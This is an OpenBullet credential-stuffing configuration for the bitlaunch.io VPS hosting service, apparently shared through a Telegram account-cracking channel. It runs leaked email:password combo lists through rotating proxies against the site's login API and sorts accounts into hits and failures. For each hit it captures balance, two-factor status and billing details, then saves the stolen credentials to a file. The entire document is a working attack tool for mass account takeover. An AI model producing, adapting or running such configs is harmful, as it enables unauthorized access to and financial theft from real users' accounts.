[SETTINGS] { "Name": "bitlaunch.io", "SuggestedBots": 150, "MaxCPM": 0, "LastModified": "2020-07-25T23:53:33.7587343+04:30", "AdditionalInfo": "[Config By: @DarkNe3t] ==> [Telegram Channel: @Club_Account]", "Author": "@DarkNe3t", "Version": "1.4.4 [Anomaly]", "IgnoreResponseErrors": false, "MaxRedirects": 8, "NeedsProxies": true, "OnlySocks": false, "OnlySsl": false, "MaxProxyUses": 0, "BanProxyAfterGoodStatus": false, "EncodeData": false, "AllowedWordlist1": "MailPass", "AllowedWordlist2": "MailPass", "DataRules": [], "CustomInputs": [], "CaptchaUrl": "", "Base64": "", "Grayscale": false, "RemoveLines": false, "RemoveNoise": false, "Dilate": false, "Threshold": 1.0, "DiffKeep": 0.0, "DiffHide": 0.0, "Saturate": false, "Saturation": 0.0, "Transparent": false, "Contour": false, "OnlyShow": false, "ContrastGamma": false, "Contrast": 1.0, "Gamma": 1.0, "Brightness": 1.0, "RemoveLinesMin": 0, "RemoveLinesMax": 0, "Crop": false, "ForceHeadless": false, "AlwaysOpen": false, "AlwaysQuit": false, "DisableNotifications": false, "CustomUserAgent": "", "RandomUA": false, "CustomCMDArgs": "" } [SCRIPT] #Length FUNCTION Length "{\"email\":\"\",\"password\":\"\"}" -> VAR "Length" #LOGIN REQUEST POST "https://app.bitlaunch.io/api/auth" CONTENT "{\"email\":\"\",\"password\":\"\"}" CONTENTTYPE "application/json" HEADER "Host: app.bitlaunch.io" HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:78.0) Gecko/20100101 Firefox/78.0" HEADER "Accept: application/json, text/plain, */*" HEADER "Accept-Language: en-US,en;q=0.5" HEADER "Accept-Encoding: gzip, deflate, br" HEADER "Content-Type: application/json" HEADER "Content-Length: " HEADER "Origin: https://app.bitlaunch.io" HEADER "Connection: keep-alive" HEADER "Referer: https://app.bitlaunch.io/login" HEADER "TE: Trailers" KEYCHECK KEYCHAIN Failure OR KEY "username or password does not exist" KEY "{\"message\":\"Password cannot be empty\"}" KEY "{\"message\":\"Email cannot be empty\"}" KEYCHAIN Success OR KEY "{\"id\":\"" KEY "\"emailConfirmed\"" #Balance PARSE "" JSON "balance" CreateEmpty=FALSE -> CAP "Balance" #Two_Factor PARSE "" JSON "twofa" CreateEmpty=FALSE -> CAP "Two Factor" #Email_Confirmed PARSE "" JSON "emailConfirmed" CreateEmpty=FALSE -> CAP "Email Confirmed" #FREE_KEY_CHECK KEYCHECK BanOnToCheck=FALSE KEYCHAIN Custom "FREE" OR KEY "" EqualTo "0" KEY "" Contains "False" KEYCHAIN Custom "2FACTOR" OR KEY "" Contains "True" #Used PARSE "" JSON "used" CreateEmpty=FALSE -> CAP "Used" #Limit PARSE "" JSON "limit" CreateEmpty=FALSE -> CAP "Limit" #Cost PARSE "" JSON "costPerHr" CreateEmpty=FALSE -> CAP "Cost" #Billing_Alert PARSE "" JSON "billingAlert" CreateEmpty=FALSE -> CAP "Billing Alert" #Negative_Allowance PARSE "" JSON "negativeAllowance" CreateEmpty=FALSE -> CAP "Negative Allowance" #Config_By FUNCTION Constant "@DarkNe3t ==> [Telegram Channel: @Club_Account]" -> CAP "Config By" #Save UTILITY File "bitlaunch.io.txt" AppendLines "<<<<<<=Account=>>>>>>\\nCombo: :\\nEmail: \\nPassword: \\n<<<<<<=Information=>>>>>>\\nBalance: \\nTwo Factor: \\nEmail Confirmed: \\nUsed: \\nLimit: \\nCost: \\nBilling Alert: \\nNegative Allowance: \\n<<<<<=CodedBy=>>>>>>\\n[Config By: @DarkNe3t] ==> [Telegram Channel: @Club_Account]\\n================" -> VAR "Save"